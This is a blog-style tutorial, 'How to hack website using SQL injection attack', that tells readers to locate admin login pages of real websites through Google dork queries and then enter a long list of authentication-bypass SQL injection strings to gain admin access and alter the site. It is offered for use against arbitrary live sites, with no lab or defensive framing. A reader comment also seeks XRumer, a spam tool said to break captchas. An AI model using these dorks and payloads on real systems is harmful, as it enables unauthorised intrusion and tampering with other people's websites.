HOW TO HACK WEBSITE USING SQL INJECTION ATTACK

sql-injection

Hello guys I will show you how to hack website using SQL injection attack. SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Now I am going to show how it works, you just follows my steps….

 

Step 1 :- First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.

                 Use any one of the following…

“inurl:admin.asp”

“inurl:login/admin.asp”

 “inurl:admin/login.asp”

-“inurl:adminlogin.asp”

 “inurl:adminhome.asp”

 “inurl:admin_login.asp”

 “inurl:administratorlogin.asp”

“inurl:login/administrator.asp”

 “inurl:administrator_login.asp”

“inurl: admin.php”

   “inurl: login/admin.php”

 “inurl: admin/login.php”

 “inurl: adminlogin.php”

 “inurl: adminhome.php”

 “inurl: admin_login.php”

 “inurl: administratorlogin.php”

 “inurl: login/administrator.php”

 “inurl: administrator_login.php”

1

In above fig. you see there is many admin page open, now just open any one page.

 

Step 2 :- Now you can use the following code and inject into user id and password field.

             For user id used admin  as user id.

             And in password field use one one of the following code and some times these codes are also used for both user id as well as password.

test’or1–

‘or 1=1#

1’or’1’=’1

‘)or1=1—

‘or ” = ‘

‘or’1’=’1

‘ or ‘1’=’1

‘ or ‘x’=’x

‘ or 0=0 —

” or 0=0 —

or 0=0 —

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 —

hi’ or 1=1 —

‘or’1=1’

‘or’ ‘=’

SQL injection attack

 

After injection following code then click submit. Here you go I am successfully login into admin page now you can do any modify or change in this website.

 SQL injection attack

 

 

 

 

3 thoughts on “HOW TO HACK WEBSITE USING SQL INJECTION ATTACK

  1. How I can get cheap XRumer 12.0.11?

    It is really new powerful tool for marketing, I’m need it, so help me please if it possible… Thank
    At first, I need SocPlugin – it unique tool for Facebook promotion, break all captchas and protections.!
    (it’s included in XRumer 12 official package, so please help me to find it! Thank you again!)

Leave a Reply

Your email address will not be published. Required fields are marked *